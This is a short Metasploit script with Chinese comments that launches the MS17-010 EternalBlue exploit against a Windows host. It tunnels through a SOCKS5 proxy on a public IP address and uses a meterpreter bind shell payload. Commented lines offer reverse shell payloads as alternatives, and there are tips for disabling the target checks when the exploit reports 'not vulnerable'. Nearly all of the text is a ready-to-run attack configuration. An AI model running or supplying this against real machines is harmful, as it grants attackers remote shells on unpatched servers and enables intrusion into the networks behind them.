# 只适用x64 win2008 win2012, x86用 ms17_010_command
# set payload windows/x64/meterpreter/reverse_tcp # 反向不好打
# set payload windows/x64/shell/reverse_tcp
# set lhost 192.168.183.131

setg proxies socks5:39.99.139.21:1234

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
# set payload windows/x64/meterpreter/bind_tcp_uuid # 不行试试这个
set rhosts 192.168.52.138
show targets
set lhost 0.0.0.0  # 设置为可达网段
setg ReverseAllowProxy true    #允许反弹shell
# set target 3
# set VERIFY_ARCH false
# set VERIFY_TARGET false  # 有时总提示 not vulnerable 用这个设置关闭检查
run

# targets 选一下能提高成功率
# LPORT     4444